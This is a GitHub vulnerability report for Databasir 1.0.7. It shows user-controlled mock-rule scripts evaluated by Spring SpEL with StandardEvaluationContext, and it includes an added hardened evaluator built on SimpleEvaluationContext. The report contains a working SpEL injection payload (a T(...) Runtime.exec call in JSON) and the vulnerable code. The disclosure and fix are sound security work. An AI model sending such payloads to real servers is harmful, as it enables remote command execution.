
database-1.0.7 has an RCE vulnerability #269

Closed
luelueking opened this issue Feb 13, 2023 · 0 comments · Fixed by #270


luelueking commented Feb 13, 2023

Impact

Databasir is a team-oriented relational database model document management platform.
Databasir 1.0.7 has remote code execution vulnerability.
A remote code execution vulnerability is a web security vulnerability through which we can execute any command, such as open -a Calculator.

Unsafe code

SpelScriptEvaluator uses StandardEvaluationContext as its context; the script parameter is user-controlled and is not filtered in any way.

SimpleEvaluationContext - For categories of expressions that do not need the full range of SpEL language syntax and should be deliberately restricted; exposes only a subset of SpEL language features and configuration options.

StandardEvaluationContext - Exposes the full set of SpEL language features and configuration options. You can use it to specify the default root object and to configure every available evaluation-related strategy.

import lombok.RequiredArgsConstructor;
import org.springframework.expression.Expression;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;
import org.springframework.stereotype.Component;

@Component
@RequiredArgsConstructor
public class SpelScriptEvaluator implements MockScriptEvaluator {

    private final SpelExpressionParser spelExpressionParser = new SpelExpressionParser();

    @Override
    public String evaluate(String script, ScriptContext context) {
        // script comes straight from the request body and is parsed unfiltered
        Expression expression = spelExpressionParser.parseExpression(script);
        // StandardEvaluationContext exposes the full SpEL feature set,
        // including T(...) type references and arbitrary method invocation
        StandardEvaluationContext spelContext = new StandardEvaluationContext(context);
        return expression.getValue(spelContext, String.class);
    }
}

Vulnerability entry point

When the rules are validated:

    @PreAuthorize("hasAnyAuthority('SYS_OWNER', 'GROUP_OWNER?groupId='+#groupId, 'GROUP_MEMBER?groupId='+#groupId)")
    @Operation(summary = "保存 Mock Rule")
    @AuditLog(module = AuditLog.Modules.PROJECT, name = "保存 Mock Rule",
            involvedProjectId = "#projectId",
            involvedGroupId = "#groupId")
    @PostMapping(Routes.MockData.SAVE_MOCK_RULE)
    public JsonData<Void> saveMockRules(@PathVariable Integer groupId,
                                        @PathVariable Integer projectId,
                                        @PathVariable Integer tableId,
                                        @RequestBody @Valid List<ColumnMockRuleSaveRequest> rules) {
        mockDataService.saveMockRules(projectId, tableId, rules);
        return JsonData.ok();
    }

POC

An attacker can control the parameters of rules to cause RCE, for example:

[
  {
    "columnName": "test",
    "dependentColumnName": "test",
    "dependentTableName": "test",
    "mockDataScript": "T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('open -a Calculator')",
    "mockDataType": "SCRIPT",
    "tableName": "test"
  }
]


Fix suggestion

The most direct way: use SimpleEvaluationContext in place of StandardEvaluationContext.

Reporter

@luelueking

Source

https://github.com/luelueking/Databasir-1.0.7-vuln-poc

@vran-dev vran-dev linked a pull request Mar 3, 2023 that will close this issue
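The fix the report suggests, worked through as an added example (this is not Databasir's code and not the linked pull request): the same evaluator rebuilt on SimpleEvaluationContext.forReadOnlyDataBinding(), which only allows property reads and public method calls on the root object and rejects T(...) type references, constructors, bean references and assignment. MockScriptEvaluator and ScriptContext are the project's own types named in the issue; the ScriptContext stand-in below, its fields, and the class name SafeSpelScriptEvaluator are assumptions made so the example compiles on its own against spring-expression.

```java
import org.springframework.expression.EvaluationException;
import org.springframework.expression.Expression;
import org.springframework.expression.ParseException;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;

// Added example, not the project's code: hardened replacement for the
// SpelScriptEvaluator quoted in the issue.
public class SafeSpelScriptEvaluator {

    private final SpelExpressionParser parser = new SpelExpressionParser();

    // Assumed stand-in for the project's ScriptContext: the root object exposes
    // only the data a mock script legitimately needs (constructed for this example).
    public static class ScriptContext {
        private final String columnName;
        private final Integer rowIndex;

        public ScriptContext(String columnName, Integer rowIndex) {
            this.columnName = columnName;
            this.rowIndex = rowIndex;
        }

        public String getColumnName() { return columnName; }
        public Integer getRowIndex() { return rowIndex; }
    }

    public String evaluate(String script, ScriptContext context) {
        Expression expression = parser.parseExpression(script);
        // Read-only data binding: property access and method calls resolve only
        // against the root object. SimpleEvaluationContext has no type locator,
        // so T(java.lang.Runtime) fails with TYPE_NOT_FOUND, and its method
        // resolver refuses methods declared on Object and Class (e.g. getClass()).
        SimpleEvaluationContext spelContext = SimpleEvaluationContext
                .forReadOnlyDataBinding()
                .withRootObject(context)
                .build();
        return expression.getValue(spelContext, String.class);
    }

    // Demonstration: a legitimate mock script still works; the shapes used by
    // the report's payload are rejected at evaluation time.
    public static void main(String[] args) {
        SafeSpelScriptEvaluator evaluator = new SafeSpelScriptEvaluator();
        ScriptContext ctx = new ScriptContext("test", 7);

        System.out.println(evaluator.evaluate("columnName + '_' + rowIndex", ctx)); // test_7

        String[] rejected = {
            "T(java.lang.Runtime).getRuntime()",          // type reference: no TypeLocator
            "columnName.getClass().getName()"             // Object/Class methods are not candidates
        };
        for (String script : rejected) {
            try {
                evaluator.evaluate(script, ctx);
                System.out.println("UNEXPECTED: accepted " + script);
            } catch (EvaluationException | ParseException e) {
                System.out.println("rejected: " + script + " -> " + e.getMessage());
            }
        }
    }
}
```

Swapping the context is the smallest change, but it still lets a script call any public method on whatever object is passed as the root, so the root object handed to evaluate should be a plain data holder like the stand-in above rather than a service with side effects. The controller's @PreAuthorize check on saveMockRules does not help here: any GROUP_MEMBER is allowed to submit rules, so the evaluator has to be safe for authenticated users too.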